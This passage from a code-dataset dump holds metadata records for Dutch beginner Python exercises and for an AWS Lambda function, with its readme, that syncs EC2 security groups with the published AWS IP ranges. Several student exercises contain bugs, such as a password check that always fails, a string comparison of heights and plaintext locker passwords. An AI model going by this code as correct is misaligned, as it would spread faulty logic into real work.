for c in invoerstring:\n cope = ord(c) + 3\n print(chr(cope),end=\"\")\n\ncode()\n\n\n\n\n" }, { "alpha_fraction": 0.6122449040412903, "alphanum_fraction": 0.6275510191917419, "avg_line_length": 19.6842098236084, "blob_id": "e50b4870aa03b9d085b6d480658cbf27f41bea49", "content_id": "a5ad7f570ea939348eb4a41bbef80b23ab57860a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 85, "num_lines": 19, "path": "/Opdrachten/3. 
Files lezen.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "file = open(\"kaartnummers\", \"r\")\n\ncount = 0\nmaxNumber = 0\nlineCount = 1\n\nfor lines in file:\n count += 1\n number = int(lines.split(\",\")[0])\n if number > maxNumber:\n maxNumber = number\n maxLine = lineCount\n lineCount += 1\n\nprint('Deze file telt', count, \"regels\")\n\nprint(\"Het grootste kaartnummer is \",maxNumber, \" en dat staat op regel: \",lineCount)\n\nfile.close()" }, { "alpha_fraction": 0.59375, "alphanum_fraction": 0.6116071343421936, "avg_line_length": 21.5, "blob_id": "41c193087831655c6ea956e651ee43b10cd2bf07", "content_id": "bea566d261d8e5051da773ec1095b280e751b8c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 224, "license_type": "no_license", "max_line_length": 69, "num_lines": 10, "path": "/Opdrachten/7.1. While-loop & numbers.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "aantalNummers = 0\nsom = 0\nwhile True:\n getal = int(input(\"Geef een getal: \"))\n if getal == 0:\n break\n som += getal\n aantalNummers += 1\n\nprint(\"Er zijn\",aantalNummers, \"nummers ingevoerd, de som is: \", som)" }, { "alpha_fraction": 0.6132478713989258, "alphanum_fraction": 0.6538461446762085, "avg_line_length": 29.225807189941406, "blob_id": "0de0061f0f4aac7d6b7346661e047502f727ce32", "content_id": "f912510b7b4a3e0c1c50e422070c48c149aaf089", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 936, "license_type": "no_license", "max_line_length": 65, "num_lines": 31, "path": "/Opdrachten/Final assignment NS functies.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def standaardprijs(afstandKM):\n if afstandKM > 0 and afstandKM <= 50:\n return afstandKM * 0.80\n if afstandKM < 0:\n return afstandKM == 0\n else:\n return (afstandKM * 0.60) + 15\n\n\naftstandKM = int(input('Geef de afstand van uw rit: '))\n\n\ndef ritprijs(leeftijd, weekendrit, afstandKM):\n if weekendrit == 'nee' and leeftijd >= 65 or leeftijd < 12:\n return standaardprijs(aftstandKM) * 0.70\n if weekendrit == 'ja' and leeftijd >= 65 or leeftijd < 12:\n return standaardprijs(aftstandKM) * 0.65\n if weekendrit == 'nee' and (leeftijd < 65 and leeftijd > 12):\n return standaardprijs(aftstandKM)\n if weekendrit == 'ja' and (leeftijd < 65 and leeftijd > 12):\n return standaardprijs(aftstandKM) * 0.60\n\n\nweekendrit = str(input('Rijs je in het weekend? ja of nee: '))\n\nleeftijd = int(input('Geef uw leeftijd: '))\n\n\nprijs = ritprijs(leeftijd, weekendrit, aftstandKM)\n\nprint(prijs)" }, { "alpha_fraction": 0.5319148898124695, "alphanum_fraction": 0.5617021322250366, "avg_line_length": 17.153846740722656, "blob_id": "ebf2faa0c78211b6cd775d438e7bdcd7274df1e1", "content_id": "9a665e9fd36ab6c134632e7da381233fda43cd3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 235, "license_type": "no_license", "max_line_length": 68, "num_lines": 13, "path": "/Opdrachten/2. 
files inlezen.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "infile = open(\"kaartnummers\", \"r\")\n\n\n\nfor line in infile:\n info = line.split(\",\")\n nummer = info[0]\n naam = info[1]\n print(naam, end=' ')\n print(('{:5}{0:5}{0:5}'.format(nummer),(\"heeft kaartnummer: \")))\n\n\ninfile.close()" }, { "alpha_fraction": 0.6288659572601318, "alphanum_fraction": 0.6288659572601318, "avg_line_length": 18.299999237060547, "blob_id": "540d0c14979eb146468d1362afac5d9f7281674f", "content_id": "62f55da85c49b945735c44d9d51c3a8cfbd4e8cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 194, "license_type": "no_license", "max_line_length": 46, "num_lines": 10, "path": "/Opdrachten/5. string functions.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "woorden = []\n\ndef gemiddelde():\n zin = input(\"Geef een willekeurige zin: \")\n woorden = zin.split()\n for lengte in woorden:\n print(len(lengte))\n\ngemiddelde()\nprint(gemiddelde())\n\n" }, { "alpha_fraction": 0.7010050415992737, "alphanum_fraction": 0.7035176157951355, "avg_line_length": 27.071428298950195, "blob_id": "bf8414ce5689a5dc983f3d55b899ecf6b7a24858", "content_id": "576017b01397b7b311cfa7e470ea63e6d2ad1d88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 398, "license_type": "no_license", "max_line_length": 60, "num_lines": 14, "path": "/Opdrachten/4.0 functie met If.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def new_password(newpassword,oldpassword):\n if len(newpassword) >= 6 and newpassword != oldpassword:\n return\n\n\noldpassword = str(input('Geef oude wachtwoord: '))\nnewpassword = str(input('Geef nieuwe wachtwoord: '))\n\nisCorrect = new_password(newpassword,oldpassword)\n\nif isCorrect == True:\n print('Het is gelukt!')\nelse:\n print('Het password is hetzelfde of niet lang genoeg.')\n\n\n\n\n\n" }, { "alpha_fraction": 0.6798029541969299, "alphanum_fraction": 0.6896551847457886, "avg_line_length": 17.454545974731445, "blob_id": "b1ba6c813a0e78433740b1ef397e38201dea59c4", "content_id": "2dec7aa435df792ddee72a13a8113317add8bbc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 203, "license_type": "no_license", "max_line_length": 44, "num_lines": 11, "path": "/Opdrachten/2. Functie met list-parameter.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def som(getallenLijst):\n return sum(getallenLijst)\n\ngetallenLijst = []\n\n\nfor i in range(0,5):\n nummers = int((input('Geef nummers: ')))\n getallenLijst.append(nummers)\n\nprint(som(getallenLijst))\n" }, { "alpha_fraction": 0.42763158679008484, "alphanum_fraction": 0.5, "avg_line_length": 20.571428298950195, "blob_id": "acae88acf29f15fb961a4ddd74fe4ba12b52afc6", "content_id": "00ea30af9190a0ae2c049b70791b83d49e8c85af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 152, "license_type": "no_license", "max_line_length": 87, "num_lines": 7, "path": "/Opdrachten/7.3. 
Dict.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "dict = {\"Jan\": 9,\"Piet\" : 8, \"Kees\":9,\"Larry\":6,\"John\":10,\"Bert\":7,\"Gijs\":9,\"Frans\":10}\n\n\n\nfor i in dict:\n if dict[i] > 8:\n print(dict[i],i)\n\n" }, { "alpha_fraction": 0.4751552939414978, "alphanum_fraction": 0.5093167424201965, "avg_line_length": 19.1875, "blob_id": "ba8d57ba23475cdbd68ba03e4c6722f5b4339ab1", "content_id": "78cd8b399e8337f177f5866a19ba6870c02c0387", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/Opdrachten/6.1 Decision Control.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "maand = int(input('Geef maand nummer: '))\n\n\ndef seizoen(maand):\n if (maand in (3 , 4 , 5)):\n season = ('Lente')\n elif (maand in (6, 7, 8)):\n season = ('Zomer')\n elif (maand in (9, 10, 11)):\n season = ('Herfst')\n else:\n season = ('Winter')\n return season\n\n\nprint(seizoen(maand))" }, { "alpha_fraction": 0.640816330909729, "alphanum_fraction": 0.6897959113121033, "avg_line_length": 26.33333396911621, "blob_id": "c0cf509573984c2f39857696c917d26bda2a616e", "content_id": "0239dd1d8df8943cf331fa0edad8410b96a9830b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 245, "license_type": "no_license", "max_line_length": 47, "num_lines": 9, "path": "/Opdrachten/1. Functie met drie parameters.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def som(getal1,getal2,getal3):\n return getal1 + getal2 + getal3\n\n\ngetal1 = int(input('Geef het eerste getal: '))\ngetal2 = int(input('Geef het tweede getal: '))\ngetal3 = int(input('Geef het derde getal: '))\n\nprint(som(getal1,getal2,getal3))" }, { "alpha_fraction": 0.5817694664001465, "alphanum_fraction": 0.6085790991783142, "avg_line_length": 23.928571701049805, "blob_id": "24f446a52ee6a21c75f1e12e7ab73b55e51ff015", "content_id": "4c14e457b04f0227b525fa0f890854c0246e71d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 373, "license_type": "no_license", "max_line_length": 62, "num_lines": 14, "path": "/Opdrachten/8.1. Catching exceptions.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "\n\ntry:\n aantal = 0\n hotel = 4356\n kosten = 4356 / aantal\n if aantal < 0:\n print(\"Negatieve getallen zijn niet toegestaan!\")\n else:\n print(kosten)\nexcept TypeError:\n print(\"Gebruik cijfers voor het invoeren van het aantal!\")\nexcept ZeroDivisionError:\n print(\"Delen door nul kan niet!\")\nexcept:\n \"Onjuiste invoer!\"\n\n\n \n \n \n \n" }, { "alpha_fraction": 0.6171875, "alphanum_fraction": 0.671875, "avg_line_length": 31.08333396911621, "blob_id": "b1fe62fb24e2ec31a1b6471bdb3624e96eea03d4", "content_id": "18c1084def39b9a1ff80ddaa69c155435cef13ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 384, "license_type": "no_license", "max_line_length": 81, "num_lines": 12, "path": "/Opdrachten/3. 
Lists & numbers.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "invoer = \"5-9-7-1-7-8-3-2-4-8-7-9\"\n\nlijst = invoer.split(\"-\")\n\nlijst2 = list(map(int, lijst))\nlijst2.sort()\ngemiddelde = sum(lijst2) / len(lijst2)\n\nprint(\"Gesorteerde list van ints: \", lijst2)\nprint(\"Grootste getal: \", max(lijst2), \" en kleinste getal: \", min(lijst2))\nprint(\"aanstal getallen: \", len(lijst2), \"en Som van de getallen: \", sum(lijst2))\nprint(\"Gemiddelde: \", gemiddelde)" }, { "alpha_fraction": 0.6035714149475098, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 30.11111068725586, "blob_id": "e6885434e228e4e70c10842c70bb54f74ac29c6c", "content_id": "96af46d4e9207ba4948a19f4f3c15f94e4bfebb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 280, "license_type": "no_license", "max_line_length": 118, "num_lines": 9, "path": "/Opdrachten/1.1 Getallen, strings and conversions.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "cijferICOR = 7\ncijferPROG = 7\ncijferCSN = 7\n\ngemiddelde = (cijferICOR + cijferPROG + cijferCSN) / 3\nbeloning = (7 * 30) + (7 * 30) + (7 * 30)\noverzicht = \"Mijn cijfers (gemiddeld een \" + str(gemiddelde) + \") leveren een beloning van $\" + str(beloning) + \" op!\"\n\nprint (overzicht)\n" }, { "alpha_fraction": 0.52173912525177, "alphanum_fraction": 0.5362318754196167, "avg_line_length": 19.352941513061523, "blob_id": "d9c41a252c56aac4c492994339e1bd1fd9e7bb29", "content_id": "51d49cd889baa6bcd9fa8cd8f865001f65bc8bbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 345, "license_type": "no_license", "max_line_length": 69, "num_lines": 17, "path": "/Opdrachten/8.3. 
CSV-files lezen.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "import csv\n\n\nmax = 0\nnaam = \"\"\ndatum = \"\"\nwith open('gamers.csv', 'r') as gamersFile:\n reader = csv.reader(gamersFile, delimiter=';')\n for row in reader:\n if int(row[2]) > max:\n naam = row[0]\n datum = row[1]\n max = int(row[2])\n\n\n\nprint(\"De hoogste score is:\", max, \"op\", datum, \"behaald door\", naam)" }, { "alpha_fraction": 0.6860264539718628, "alphanum_fraction": 0.6877515912055969, "avg_line_length": 39.44186019897461, "blob_id": "d80e6f954a2f9d900d80ae5a5c2d4cda71becf2a", "content_id": "553b187144ab14521241274e5f6646ac0d1ca759", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1741, "license_type": "no_license", "max_line_length": 100, "num_lines": 43, "path": "/Opdrachten/Final Assignment NS-kaartautomaat.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "stations = [\"Schagen\", \"Heerhugowaard\", \"Alkmaar\", \"Castricum\", \"Zaandam\",\n \"Amsterdam\" \"Sloterdijk\", \"Amsterdam Centraal\", \"Amsterdam Amstel\", \"Utrecht Centraal\",\n \"’s-Hertogenbosch\", \"Eindhoven\", \"Weert\", \"Roermond\", \"Sittard\", \"Maastricht\"]\n\n\ndef inlezen_beginstation(stations):\n while True:\n beginstation = input(\"Wat is je beginstation?: \")\n if beginstation in stations:\n break\n return beginstation\n\ndef inlezen_eindstation(stations, beginstation):\n while True:\n eindstation = input(\"Wat is je eindstation?: \")\n eindIndex = stations.index(eindstation)\n beginIndex = stations.index(beginstation)\n if eindstation in stations and eindIndex > beginIndex:\n break\n else:\n print(\"Dit station ligt niet op de route\")\n return eindstation\n\n\ndef omroepen_reis(stations, beginstation, eindstation):\n beginRangnummer = stations.index(beginstation) + 1\n eindRangnummer = stations.index(eindstation) + 1\n print(\"Het beginstation\", beginstation, \"is het\", beginRangnummer,\"e station in het traject.\", )\n print(\"Het eindstation\", eindstation,\"is het\", eindRangnummer, \"e station in het traject.\")\n print(\"De afstand bedraagt\",eindRangnummer - beginRangnummer ,\"station(s).\")\n print(\"De prijs van het kaartje is\",(eindRangnummer - beginRangnummer)*5,\"euro.\\n\")\n print(\"Jij stapt in de trein in:\", beginstation,)\n for x in stations[beginRangnummer:stations.index(eindstation)]:\n print(\"-\",x)\n print(\"Jij stapt uit in:\", eindstation)\n return\n\n\n\n\nbeginstation = inlezen_beginstation(stations)\neindstation = inlezen_eindstation(stations, beginstation)\nomroepen_reis(stations, beginstation, eindstation)\n" }, { "alpha_fraction": 0.6487804651260376, "alphanum_fraction": 0.6487804651260376, "avg_line_length": 33, "blob_id": "0b12975d4bc3aba1f219708d7f4c2e6626beb81b", "content_id": "fea5eca302deacbe6c26e70e6e6f019da46d52ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 86, "num_lines": 6, "path": "/Opdrachten/1.3. 
input output.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "uurloon = float(input('Wat verdien je per uur: '))\naantalUur = int(input(\"Hoeveel uur heb je gewerkt: \"))\n\nx = str(aantalUur) + (\" uur werken levert \") + str(uurloon * aantalUur) + (\" euro op\")\n\nprint(x)\n\n" }, { "alpha_fraction": 0.6549295783042908, "alphanum_fraction": 0.672535240650177, "avg_line_length": 19.071428298950195, "blob_id": "9b8377aabd81b06fe84c2f4905328989864e9fe6", "content_id": "5e2689b98869968111a3ca8b41ce3a47629e06a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 284, "license_type": "no_license", "max_line_length": 44, "num_lines": 14, "path": "/Opdrachten/5.0 Functie met list-parameter en for-loop.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def kwadraten_som(grondgetallen):\n return sum(grondgetallen)\n\n\ngrondgetallen = []\n\nfor even in range(0, 5):\n nummers = int((input('Geef nummers: ')))\n if nummers % 2 == 0:\n grondgetallen.append(nummers**2)\n\n\nprint(grondgetallen)\nprint(kwadraten_som(grondgetallen))\n\n\n\n" }, { "alpha_fraction": 0.47699758410453796, "alphanum_fraction": 0.48426151275634766, "avg_line_length": 23.352941513061523, "blob_id": "457bd9289422a3c3c86dacf09b429423f604a130", "content_id": "5c29d10bce91e2d352a7d006313d822960e31468", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 413, "license_type": "no_license", "max_line_length": 63, "num_lines": 17, "path": "/Opdrachten/7.5. Dict & functions.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "dict = {}\ndef namen():\n while True:\n deNamen = input(\"Volgende naam: \")\n if deNamen == \"\":\n break\n elif deNamen not in dict:\n dict[deNamen] = 1\n else:\n dict[deNamen] += 1\nnamen()\n\nfor x in dict:\n if dict[x] == 1:\n print(\"Er is \", dict[x], \"student met de naam \", x)\n else:\n print(\"Er zijn \", dict[x], \"studenten met de naam \", x)" }, { "alpha_fraction": 0.5963302850723267, "alphanum_fraction": 0.6100917458534241, "avg_line_length": 26, "blob_id": "ecde604a5b2daec95a2bca598c0cb189a2e3d686", "content_id": "6140ff3e50fd27a1134342c189d10b5e88da16c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 218, "license_type": "no_license", "max_line_length": 55, "num_lines": 8, "path": "/Opdrachten/3.0 functie met if.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def lang_genoeg(lengte):\n if lengte >= str('120'):\n print('Je bent lang genoeg voor de attractie!')\n else:\n print('Sorry, je bent te klein')\n\n\ngeefLengte = lang_genoeg (input('Geef je lengte: '))\n\n\n" }, { "alpha_fraction": 0.6544502377510071, "alphanum_fraction": 0.6596858501434326, "avg_line_length": 32.260868072509766, "blob_id": "eff0e8509693093d1203b1ea4a3516fe9a69db51", "content_id": "9a81d056487353d264ad91aa25920a2e7e679abd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 764, "license_type": "no_license", "max_line_length": 102, "num_lines": 23, "path": "/Opdrachten/8.4. 
CSV-files met headers.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "import csv\n\n\nartikelPrijs = 0\nartikelNaam = ''\nvoorraad = 0\nproductnummer = 0\ntotalVoorraad = 0\nwith open('producten.csv','r') as productenFile:\n reader = csv.DictReader(productenFile, delimiter=';')\n for row in reader:\n totalVoorraad += int(row['voorraad'])\n if float(row['prijs']) > float(artikelPrijs):\n artikelPrijs = row['prijs']\n artikelNaam = row['naam']\n elif int(voorraad) < int(row['voorraad']):\n voorraad = int(voorraad) + int(row['voorraad'])\n productnummer = row['artikelnummer']\n\n\nprint(\"Het duurste artikel is\", artikelNaam, 'en die kost', artikelPrijs)\nprint(\"Er zijn slechts\", voorraad, \"exemplaren in voorraad van het product met nummer\", productnummer)\nprint(totalVoorraad)" }, { "alpha_fraction": 0.6043956279754639, "alphanum_fraction": 0.6087912321090698, "avg_line_length": 18.69565200805664, "blob_id": "a6365ebb266aa23d8942da0e2cf70cd8cdffcdba", "content_id": "a194be26b833b246633e504caedff0b21b63bd5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 455, "license_type": "no_license", "max_line_length": 48, "num_lines": 23, "path": "/Opdrachten/7.4. File & dict.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "file = open(\"ticker.txt\",\"r\")\n\ndict = {}\n\ndef ticker():\n for lines in file:\n bedrijf = str(lines.split(\":\")[0])\n symbool = str(lines.split(\":\")[1])\n dict[bedrijf] = symbool\n\nticker()\n\nwhile True:\n enterCompany = input(\"Enter company name: \")\n company = dict[enterCompany]\n print(\"Ticker symbool:\", company)\n break\n\n\n\nenterSymbool = input(\"Enter Ticker Symbool: \")\nif enterSymbool in dict.values():\n print(\"Check\")\n\n\n" }, { "alpha_fraction": 0.6016677618026733, "alphanum_fraction": 0.6234765648841858, "avg_line_length": 29.58823585510254, "blob_id": "e89914dd4d2bca189e857bbdd2e9591776ae1f25", "content_id": "2126a9e6ee53220231cb691b932e7cf040f5e4ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1559, "license_type": "no_license", "max_line_length": 127, "num_lines": 51, "path": "/Opdrachten/Final assignment Bagagekluizen.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "print(\"1: Ik wil weten hoeveel kluizen nog vrij zijn \\n2: Ik wil een nieuwe kluis \\n3: Ik wil even iets uit mijn kluis halen \")\n\nkeuze = (int((input(\"Kies uit optie 1, 2 of 3: \"))))\n\n\nfile = open(\"kluizen.txt\",\"r+\")\n\ndef toon_aantal_kluizen_vrij():\n lines = sum(1 for line in file)\n linesRemaining = 12 - lines\n print(\"Er zijn nog:\", linesRemaining, \"kluizen vrij\")\n\n\ndef nieuwe_kluis():\n kluisnummers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n for lines in file:\n deKluisnummers = int(lines.split(\";\")[0])\n if deKluisnummers in kluisnummers:\n kluisnummers.remove(deKluisnummers)\n if len(kluisnummers) > 0:\n wachtwoord = (input(\"Geef een code voor uw kluisje: \"))\n file.write((str(kluisnummers[0]) + \";\" + str(wachtwoord) + \"\\n\"))\n print(\"u heeft kluisnummer: \" + str(kluisnummers[0]))\n elif len(kluisnummers) == 0:\n print(\"Er zijn geen kluisjes meer beschikbaar\")\n\ndef kluis_openen():\n geefKluisnummer = input(\"Geef uw kluisnummer: \")\n geefWachtwoord = input(\"Geef uw wachtwoord: \")\n for lines in file:\n jeKluisnummer = lines.split(\";\")[0]\n jeWachtwoord = lines.split(\";\")[1]\n if geefKluisnummer in 
jeKluisnummer and geefWachtwoord in jeWachtwoord:\n print(\"Uw kluisje is geopent\")\n break\n else:\n print(\"combinatie incorrect\")\n\n\n\nif keuze == 1:\n toon_aantal_kluizen_vrij()\nelif keuze == 2:\n nieuwe_kluis()\nelif keuze == 3:\n kluis_openen()\nelse:\n print(\"ERROR Deze optie is niet beschikbaar\")\n\n\nfile.close()" }, { "alpha_fraction": 0.6194690465927124, "alphanum_fraction": 0.6194690465927124, "avg_line_length": 21.200000762939453, "blob_id": "ccb5e26c0b722816de3f9baff48e34a9144ebc27", "content_id": "3e02d3026069838d78cd1423a06116dd27e5e27d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 113, "license_type": "no_license", "max_line_length": 50, "num_lines": 5, "path": "/Opdrachten/6. For, If & vowels.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "s = \"Guido van Rossum heeft programmeertaal Python bedacht.\"\n\nfor even in s:\n if even in 'aeiou':\n print(even)\n\n\n" }, { "alpha_fraction": 0.60502690076828, "alphanum_fraction": 0.60502690076828, "avg_line_length": 31.764705657958984, "blob_id": "e87c147326acdc4d6bf06374c0ac6b02a9e03532", "content_id": "a813cefcda2b7ed6ffdd2d9f35d927b94c492775", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 557, "license_type": "no_license", "max_line_length": 63, "num_lines": 17, "path": "/Opdrachten/8.2 CSV-files schrijven.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "import datetime\nimport csv\nmydate = datetime.datetime.now()\nwith open('inloggers.csv', 'w', newline='') as bestand:\n writer = csv.writer(bestand, delimiter=';')\n writer.writerow(('datum','naam','voorl','gbdatum','email'))\n\n\n while True:\n naam = input(\"Wat is je achternaam? \")\n if naam == \"einde\":\n break\n voorl = input(\"Wat zijn je voorletters? \")\n gbdatum = input(\"Wat is je geboortedatum? \")\n email = input(\"Wat is je e-mail adres? \")\n\n writer.writerow((mydate, naam, voorl, gbdatum, email))\n" }, { "alpha_fraction": 0.6103448271751404, "alphanum_fraction": 0.6103448271751404, "avg_line_length": 25.454545974731445, "blob_id": "4d8ea926318b24b926028bab1a703470f0b706d1", "content_id": "f7d2558d83361202cb00b1772aec8732498db9d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 48, "num_lines": 11, "path": "/Opdrachten/4. Files schrijven.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "import datetime\ndef strftime():\n vandaag = datetime.datetime.today()\n s = vandaag.strftime(\"%a %d %b %Y %H:%M:%S\")\n return (s)\n\ndatum = strftime()\nnaam = input(\"Naam hardloper: \")\nrunners = open(\"Hardlopers.txt\", \"a+\")\nrunners.write(datum + \" \" + naam + \" \" + \"\\n\")\nrunners.close()" } ]
31
marekq/aws-ip-ranges
https://github.com/marekq/aws-ip-ranges
9561464735b7468b833e6619ec5ddaf549b7215b
2dcd25a9eb0bc84be39e199827f0c6df35ced69a
f53addfaaefaaa2cc8a0b200a69e07bdf25f3e8e
refs/heads/master
2020-04-12T03:59:46.060831
2019-05-26T23:22:05
2019-05-26T23:22:05
162,281,495
4
0
null
null
null
null
null
[ { "alpha_fraction": 0.5998824834823608, "alphanum_fraction": 0.6139835715293884, "avg_line_length": 25.200000762939453, "blob_id": "91fddef7c70ec35165f062908bfeaad3daa7777d", "content_id": "41ab522a527f4d526123697c1788581da9cb7ff4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1702, "license_type": "no_license", "max_line_length": 131, "num_lines": 65, "path": "/lambda_function.py", "repo_name": "marekq/aws-ip-ranges", "src_encoding": "UTF-8", "text": "import boto3, json, os\nfrom botocore.vendored import requests\nfrom netaddr import *\n\nec2 \t\t\t= boto3.client('ec2')\nport\t\t\t\t= 443\nproto\t\t\t\t= 'tcp'\n\ndef main(sgname, sgjson):\n\tc \t= int(0)\n\ts1\t\t\t= []\n\ts2\t\t\t= []\n\tsg_list \t= []\n\tsupernet\t= []\n\tjson_list\t= []\n\tsg_id\t\t= ''\n\n\ttry:\n\t\tsg \t= ec2.describe_security_groups(Filters=[{'Name': 'tag:dnsservice', 'Values': [sgname]}])['SecurityGroups']\n\n\texcept:\n\t\tsg\t\t= []\n\n\tfor z in sg:\n\t\tsg_id\t= z['GroupId']\n\t\tfor a in z['IpPermissions']:\n\t\t\tfor b in a['IpRanges']:\n\t\t\t\tsg_list.append(b['CidrIp'])\n\t\t\t\t\n\tfor y in json.loads(sgjson.text)['prefixes']:\n\t\tif y['service'] == sgname:\n\t\t\tjson_list.append(y['ip_prefix'])\n\t\t\tc += int(1)\n\n\tfor y in IPSet(json_list).iter_cidrs():\n\t\ts1.append(str(y))\n\t\t\n\ts2\t= cidr_merge(s1)\n\tfor y in s2:\n\t\tsupernet.append(str(y))\n\n\tprint('{0: <20}'.format(sgname)+' \\t '+str(len(json_list))+' sgs reduced to '+str(len(supernet))+' sgs')\n\n\tif sg_id != '':\n\t\tfor sg in sg_list:\n\t\t\tif sg not in supernet:\n\t\t\t\tec2.revoke_security_group_ingress(GroupId = sg_id, IpProtocol = proto, CidrIp = sg, FromPort = int(port), ToPort = int(port))\n\t\t\t\tprint(sg_id+' removing '+sg)\n\t\t\n\t\tfor y in supernet:\t\t\n\t\t\tif y not in sg_list:\n\t\t\t\tec2.authorize_security_group_ingress(GroupId = sg_id, IpProtocol = proto, CidrIp = y, FromPort = int(port), ToPort = int(port))\n\t\t\t\tprint(sg_id+' adding '+y)\n\t\n\t\tprint('{0: <20}'.format(sgname)+' \\t '+str(len(supernet)), 'items in '+str(sg_id))\n\ndef lambda_handler(event, context):\n\tserv\t= []\n\tsgjson\t= requests.get('https://ip-ranges.amazonaws.com/ip-ranges.json')\n\tfor y in json.loads(sgjson.text)['prefixes']:\n\t\tif y['service'] not in serv:\n\t\t\tserv.append(y['service'])\n\n\tfor s in serv:\n\t\tmain(s, sgjson)" }, { "alpha_fraction": 0.7693677544593811, "alphanum_fraction": 0.7773820161819458, "avg_line_length": 43.939998626708984, "blob_id": "2e0ea96b1246a692ce51dd48de7b906722214815", "content_id": "c370c57e48e1a6c0ee18ce68710068d6954608db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2246, "license_type": "no_license", "max_line_length": 322, "num_lines": 50, "path": "/readme.md", "repo_name": "marekq/aws-ip-ranges", "src_encoding": "UTF-8", "text": "aws-ip-ranges\n=============\n\nA Lambda function to automatically create security groups for the address ranges of CloudFront, Route 53 Healthchecks and other AWS services. This can be helpful in case you want to grant access to your EC2 instances from only one of these services and want to have direct control over which security groups are updated. \n\nSince the IP address ranges change on regular basis and I'm leveraging several of these services, I found this the simplest way to manage security groups. 
By default it runs once per hour and can whitelist IP ranges for any of the following AWS services (as of December 2018);\n\n- AMAZON\n- AMAZON_CONNECT\n- CLOUD9\n- CLOUDFRONT\n- CODEBUILD\n- EC2\n- GLOBALACCELERATOR\n- ROUTE53\n- ROUTE53_HEALTHCHECKS\n- S3\n\nThe function retrieves the AWS IP ranges from the official JSON document containing updates; https://ip-ranges.amazonaws.com/ip-ranges.json .\n\nThe function can be considered an alternative to the SNS-based function available on the CloudFront GitHub; https://github.com/aws-samples/aws-cloudfront-samples/tree/master/update_security_groups_lambda \n\nInstallation\n------------\n\nUse the attached CloudFormation template to deploy the function to Lambda. Next, you should tag all the security groups which should be automatically refreshed with one of the service names mentioned in the AWS JSON file; \n\n\n![alt tag](https://raw.githubusercontent.com/marekq/aws-ip-ranges/master/docs/1.png)\n\n\nWhen you now invoke the Lambda function, the logs should display the address ranges that are added or removed from the security groups;\n\n\n![alt 